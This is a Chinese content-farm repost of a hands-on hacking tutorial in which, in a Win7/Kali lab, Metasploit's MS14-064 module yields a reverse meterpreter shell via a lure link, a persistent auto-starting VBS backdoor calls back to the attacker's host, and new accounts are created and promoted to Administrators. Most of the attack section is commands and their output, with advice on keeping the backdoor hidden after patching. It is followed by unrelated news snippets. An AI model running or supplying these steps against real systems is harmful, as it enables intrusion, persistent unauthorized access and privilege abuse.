临汾山东漯河饰品美体美文
投稿投诉
美文创意
爱情通信
用品婚姻
爱好看病
美体软件
影音星座
瑜伽周边
星座办公
饰品塑形
搞笑减肥
幼儿两性
智家潮品
漯河衢州
兴义眉山
桂林阳泉
玉溪简阳
山东遂宁
永城新余
梧州洛阳
泸州温州
临汾清远
营口常熟
浙江大连
桐乡宜昌

网络安全实战之植入后门程序

5月1日 皇极城投稿
  在VMware上建立两个虚拟机:win7和kali。
  Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。
  可以永久免费使用,基本上学黑客攻击必会用到这个系统。
  靶机:Win764位(IP:192。168。10。45)用ipconfig进行查询。
  攻击机:Kali(IP:192。168。10。21)用ifconfig进行查询。
  【一一帮助安全学习,所有资源关注我,私信回复资料获取一一】
  网络安全学习路线
  20份渗透测试电子书
  安全攻防357页笔记
  50份安全攻防面试指南
  安全红队渗透工具包
  网络安全必备书籍
  100个漏洞实战案例
  安全大厂内部视频资源
  历年CTF夺旗赛题解析1、实验环境前提条件
  win7中,关闭防火墙(打开网络和共享中心Windows防火墙打开或关闭Windows防火墙均选择关闭选项)。
  保证两个虚拟机是可以ping通的(尤其是在kali中去pingwin7,看能否连通)。
  ping192。168。10。45
  2、打开Metasploit渗透工具
  Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端:msfconsole
  结果:成功进入,进入到msf6的模式下
  3、查看需要利用的漏洞
  搜索漏洞,编号为MS14064。
  MS14064为WindowsOLE自动化阵列远程代码执行漏洞。当IE不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用IE浏览器查看该网站时允许远程执行代码。
  【补充:Windows系统漏洞微软的漏洞编号命名格式为:MS14064;
  MSMicosoft的缩写,固定格式;
  14表示年份,即2014年发布的漏洞;
  064表示顺序,即当年度发布的第64个漏洞。searchms14064
  结果:可以看到返回了多条可利用的漏洞模块信息
  4、尝试利用其中一个漏洞模块进行攻击
  利用其中一个漏洞攻击模块0模块,进行攻击,进入模块中(注意:必须是,不是,否则会报错)。useexploitwindowsbrowserms14064olecodeexecution
  结果:成功切换到这个模块之下msf6exploit(windowsbrowserms14064olecodeexecution)
  并提示nopayloadconfigured,defaultingtowindowsmeterpreterreversetcp没有配置payload,默认为windowsmeterpreterreversetcp
  5、查看该漏洞模块所需的参数情况
  进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数。showoptions
  结果:其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;
  重点关注6个参数配置,需要设置哪个就设置哪个:Payload(攻击载体使用默认的windowsmeterpreterreversetcp即可);
  SRVHOST(文件共享服务器kali地址);
  SRVPORT(文件共享服务器的端口使用默认获取的端口即可);
  LHOST(发起攻击的地址kali地址);
  LPORT(发起攻击的端口使用默认获取的端口即可);
  AllowPowershellPrompt(开启浏览器插件,默认为false)
  【补充说明:
  1)Payload中包含有需要在远程系统中运行的恶意代码,Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。
  2)Payload模块主要有以下三种类型:SingleStagerStageSingle是一种完全独立的Payload,实现的目的也简单,但容易被捕捉到。
  Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的StagersPayload就是reversetcp,它可以让目标系统与攻击者建立一条tcp连接(3次握手4次挥手)(是一个基于TCP的反向链接反弹shell,使用起来很稳定)。
  Stage是StagerPayload下载的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。
  3)windowsx64meterpreterreversetcp则由一个StagerPayload(reversetcp)和一个StagePayload(meterpreter)组成。
  注意:Payload为windowsmeterpreterreversetcp默认获取到的控制通道meterpreter为32位,
  如果想将之后获取到的控制通道meterpreter改为64位,则设置。payload:windowsx64meterpreterreversetcp6、设置文件共享服务器
  发现SRVHOST为空,待设置,其它(payloadSRVPORTLHOSTLPORT)均已获取,且正确,设置SRVHOST的对应的参数地址,它指的是文件共享服务器的地址,想一想,要设成谁?为什么?
  分析一下:是在哪里用到这个文件共享服务器?是不是会在生成一个网址,诱导用户点击了,就会直接连接到发起攻击的主机上。那你们觉得应该是谁生成这个连接呢?是用户那边么?还是攻击者这边?肯定是攻击者这边吧,我们是不知道会有谁点了这个网站链接吧。
  所以,我们才会对这个文件共享服务器的地址设置为kali的地址setSRVHOST192。168。10。21
  7、开启浏览器插件
  要把AllowPowershellPrompt的默认参数false改为true,因为msf中自带的漏洞是利用exp调用的是powershell(powershell是一种命令外壳程序和脚本环境),所以msf的exp代码只对安装了powershell的系统生效。setAllowPowershellPrompttrue
  8、再次进行检查
  查看对SRVHOST和AllowPowershellPrompt进行的修改,是否修改成功showoptions
  9、检查无误后,发起攻击run
  结果:生成一个网站的链接UsingURL:http:192。168。10。21:8080xE6RxjSy,开启服务,光标停留在这,等待有人点击该网站链接。
  10、打开网站链接
  到win7中,在IE浏览器中打开网站链接:http:192。168。10。21:8080xE6RxjSy,会提示是否允许打开一个文件,选择允许之后,即可触发会话连接。
  结果1:在win7中打开链接后,不会有任何的反馈结果。
  结果2:由于在win7中触发打开了网址链接,那么,在kali中,则会触发会话连接,结果显示了是192。168。10。45(目标主机win7)尝试点击了该网站链接,于是,kali利用MS14064漏洞模块对目标主机发起了攻击,最终,meterpretersession1opened表明已经开通192。168。10。21:4444和192。168。10。45:49191会话连接1。
  一般会自动进入控制通道meterpreter,交互模式,表明攻击成功。
  注意:
  一旦开通一个会话连接后,若系统没有自动进入控制通道,则可以尝试回车,进行手动连接。
  1)手动查看当前存在的会话
  注意在目录msf下,手动查看当前存在的会话。
  结果:当前只有会话连接1,meterpreter建立的连接类型type是x8632位的(由模块中的payload设定),以及展示目标主机192。168。10。45的基本信息和连接信息。sessions
  2)选择连接当前已经开通的会话1sessionsi1
  结果:成功进入控制通道meterpreter,交互模式,表明攻击成功。
  11、植入后门程序
  在kali控制win7后,通过persistence,在目标主机上生成一个后门程序,以便后续不再通过MS14064漏洞进行二次入侵,而是通过这个后门文件来入侵该主机【注意在控制通道meterpreter下】。
  注意:因为这个MS14064漏洞很容易被修复,一旦目标主机进行定期修补漏洞,那么通过MS14064漏洞进行入侵的路径,就会失效,但植入的后门程序是不容易被发现和修复的,所以一旦入侵成功后,建议尝试植入后门程序。
  通过persistence(支持多种方式启动)植入固定的后门程序,设置相关参数,设置回连地址和端口号。runpersistenceSUXi5p40000r192。168。10。21
  重点关注6个参数配置:S:系统启动时自动加载本程序(因为该后门程序是不能被目标用户发现,更不需要让目标主机进行点
  击启动的,所以需要该程序有自动加载的功能);
  U:用户登陆时自动加载本程序;
  X:开机时自动加载本程序;
  i:自动加载后,回连的时间间隔,即后门每隔多少秒尝试连接回连地址;
  r:自动加载后,回连的主机地址,回连到谁啊,自然是入侵的kali的地址;
  p:自动加载后,回连的端口号,即kali地址的端口号,理论上可随意设置,但范围不要超过65535,且
  不可设置为常见的特殊的端口号;
  结果1:在kali中提示,成功生成一个后门程序yqLAOjt。vbs,自动加载后会回连到192。168。10。21:40000,并保存于目标主机win7中的C:Users18044AppDataLocalTemp目录下。
  【注意:payload自动设置为windowsmeterpreterreversetcp,LHOST设置为192。168。10。21,LPORT设置为40000】
  结果2:在win7中的C:Users18044AppDataLocalTemp目录下,成功找到从攻击主机kali植入的后门程序yqLAOjt。vbs
  【补充知识点:
  1)端口号范围:065535
  2)常见端口号列举
  12、挂起当前会话
  在成功植入后门程序后,我们还需要对该后门程序进行验证,验证是否可以通过该后门程序成功入侵目标主机win7,所以可先将当前通过MS14064漏洞开启的会话连接挂起(background)或断开(exit),均可meterpreterbackground
  结果:成功将session会话1挂起到后台,并没有断开连接,且成功切换到msf目录下
  13、开启监听模块
  利用后门程序进行攻击,需要打开一个监听模块,能够反弹shell监听模块,进行攻击,进入模块中useexploitmultihandler
  结果:成功切换到这个模块之下msf6exploit(multihandler)
  并提示Usingconfiguredpayloadgenericshellreversetcp使用的payload为genericshellreversetcp
  14、查看该监听模块所需的参数情况
  进到这个监听模块之后,先查看该模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数?showoptions
  结果:其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;
  重点关注3个参数配置,需要设置哪个就设置哪个:Payload:攻击载体;
  LHOST:回连地址;
  LPORT:回连端口号;
  15、设置攻击载体、回连地址以及端口号
  因为我们要开启的这个监听模块,是专门针对于yqLAOjt。vbs后门程序,进行实时监听,那么,必然需要将监听模块的参数配置,与yqLAOjt。vbs后门程序的参数配置保持一致,只有这样,才能达到准确的监听
  之前制作yqLAOjt。vbs的参数为:runpersistenceSUXi5p40000r192。168。10。21
  因此,我们也就需要将监听模块的攻击载体Payload,与后门程序的payload保持一致:setpayloadwindowsmeterpreterreversetcp
  需要将监听模块的回连地址LHOST,与后门程序的LHOST保持一致:setLHOST192。168。10。21
  需要将监听模块的回连地址的端口号LPORT,与后门程序的LPORT保持一致:setLPORT40000
  16、再次进行检查showoptions
  17、检查无误后,发起攻击run
  结果:开启针对192。168。10。21:40000的监听模式,因为yqLAOjt。vbs后门程序已经设置了自动加载,所以一旦开启监听模块,立即会有反馈信息回连到192。168。10。21:40000上来。
  最终,meterpretersession2opened表明已经开通192。168。10。21:40000和192。168。10。45:49227的会话连接2。
  一般会自动进入控制通道meterpreter,交互模式,表明攻击成功。
  【注意:
  此时,将当前开启的会话进行挂起操作background,再查看当前已存在的会话sessions,结果会得到已开启两个会话连接信息,要对这两个会话连接进行区分,分清楚,第一个会话连接是通过MS14064漏洞开启的,第二个会话连接是通过后门程序开启的
  18、创建用户、设置密码
  1)拿到shell权限,获得控制台权限,可以获取系统的控制台C:Windowssystem32meterpretershell
  2)进入后,可能会有乱码的情况,解决乱码问题C:Windowssystem32chcp65001
  3)显示win7系统中所有的用户C:Windowssystem32netuser
  4)创建用户
  创建用户,用户名为test,密码为test【netuser用户名密码add】C:Windowssystem32netusertesttestadd
  也可以不设置密码,只创建用户名为test1的无密码用户【netuser用户名add】C:Windowssystem32netusertest1add
  结果1:在kali中,若结果显示thecommadcompletedsuccessfully代表命令执行成功,用户创建成功;
  若结果显示systemerror5accessisdenied发生系统错误5;拒绝访问代表权限不够的问题,需要进行提权,可以利用bypassuac或者Windows内核漏洞进行提权
  结果2:在win7中,控制面板添加或删除用户账户,查看成功新建的用户test(标准用户密码保护)、test1(标准用户无密码)
  5)将新用户添加到administrator分组提升到管理员权限【netlocalgroupadministrators用户名add】C:Windowssystem32netlocalgroupadministratorstest1add
  结果1:在kali中,显示thecommadcompletedsuccessfully代表命令执行成功,成功添加到administrator分组,提升管理员权限成功;
  结果2:在win7中,控制面板添加或删除用户账户,查看新建的用户test1用户由之前的标准用户提升至管理员,提升权限成功。
投诉 评论

网络安全实战之植入后门程序在VMware上建立两个虚拟机:win7和kali。Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电……辽宁稳居第二,继伟苦等冠军拼图,CBA进入剩者为王时期202223赛季CBA常规赛第15轮,辽宁队118102战胜天津队。赛后发布会,辽宁队由助教洛佩斯出席总结比赛。洛佩斯说道:首先,这场比赛我们赢了下来,为了我们杨导,他今……2元20片的退烧药火了!股价一字涨停,刚被罚1。33亿近日,2块钱就能买到20片对乙酰氨基酚片将东北制药送上热搜。对此,东北制药回应,目前市面上退烧药供应不足,公司正在加班加点生产,现在每日可向药房供货约300件,药品仍然按照以前……不打扰别人,也是一种幸福现在人与人之间的交流真的很少了,有些时候交流只是一种应付,或者说是一种敷衍,真正的心与心的交流,是会感应到的。友不在多,三五就好,情不在迷,真心最真。很久没有和别人说心里……国乒赢了却也输了,世界冠军犀利点出樊振东弱点,批评王楚钦软肋北京时间10月9日,国乒在之前的世乒赛男团半决赛里32险胜日本队,比赛确实是赢了,但是最大的危机也已经降临了。至少在这次半决赛当中,中国队已经无人能够稳胜张本智和了。樊振……空降播出,5集破亿,要不是看到评分,都不知道该剧已经开播了最近几个月,可以说是古偶剧百花齐放的时段了,先有杨洋、赵露思的《且试天下》,袁冰妍、郑业成的《祝卿好》;后有虞书欣、王鹤棣的《苍兰诀》,杨紫、成毅的《沉香如屑》。以及待播的《玉……为什么冥王星被开除了行星资格?宇宙太大,而人类当下的宇宙探测技术还较为原始和落后(最起码和渴望星际旅行的人来说是如此)。所以,人类对宇宙的认知是缓慢的。但是,虽然缓慢,却也意味着不断进步。比如,人类对冥王星……宇宙中的一些非对称性照照镜子,我们会发现身体左侧与右侧几乎相同,这称为对称性。我们不仅可以在自然界看到它,而且更根本的是,对称性似乎写在宇宙的蓝图中。例如,量子力学中的对称性导致了三种基本的自然力……李少莉的工资可以支撑她的消费吗?被网暴冤枉?李少莉事件可以说出乎大家的意料,谁也没有想到简单的一个发布会在网络上竟然会起这么大的热议,如果知道相信李少莉也好,还是另外的领导盟主认为都不会让李少莉参加这个发布会。但是事情没……沈梦辰追爱九年才与杜海涛领证,婚后九个月没等来婚礼却传出婚变俗话说女追男隔层纱,那么一旦追求的这个男生不喜欢这个女的,那隔的就不是一层纱,而是一堵墙了,还是那种怎么推也推不倒的。沈梦辰就是那个勇敢追爱的女孩,因为她追求了杜海涛9年……英锦赛后最新斯诺克排名,谁的升幅最大?奥沙利文依然雄踞榜首随着2022英锦赛马克艾伦以107的比分击败丁俊晖夺得冠军,同时收获250000英镑冠军奖金,马克艾伦的排名上升4位,由第9位升至第5。获得亚军的丁俊晖也获得100000英镑进……我把喜欢写进风里!散文作者:浪漫季节生活,一半是回忆,一半是继续。那些不咸不淡的日子总教会了我门些什么,不能释怀的,都沉淀在岁月里。岁月静好,不紧不慢,不慌不忙!生活五味杂陈……
奥运冠军徐梦桃成名背后有眼泪和艰辛,31岁夺28个世界冠军温网禁赛俄罗斯人,又祝福莎娃怀孕!网友攻占评论区不配谈莎娃只能为生存奋斗!电动化洪流下,日本的汽车零部件供应商能挺住吗外媒华为已经开始脱胎换骨了苹果14将采用打孔屏设计拒绝贴标签,共享游戏主机的优势,W未来娱乐空间的市场占有率国乒隐藏的富二代,李隼的关门弟子,却因患癌面临职业危机解放者杯博卡青年vs卡利体育士别三日,刮目相看山青水秀的古里部落康桥旭强云庐冰雪乐园凉爽继续13G运存6000mAh大电池,8256G低至1494,中兴吃鸡M762新升级枪来了,高级外观自带刺刀,打开机瞄开眼了粽子魔方还原教程图解瓶子陪我过暑假作文使命召唤手游版下载量破2000万,印度玩家第一两个字的微信名字小区围墙怎么装饰奇妙的太阳小学生作文只要坚持,就会有意想不到的收获韩庚35岁生日晒照片曝光妈妈和女友陪伴喜庆温馨法官知道重婚会怎么办?民事诉讼中一方当事人死亡后的诉讼问题苹果iOS15。1Beta3已恢复单独禁用AppleTV和A黑豆包囊线虫病的综合防治

友情链接:中准网聚热点快百科快传网快生活快软网快好知文好找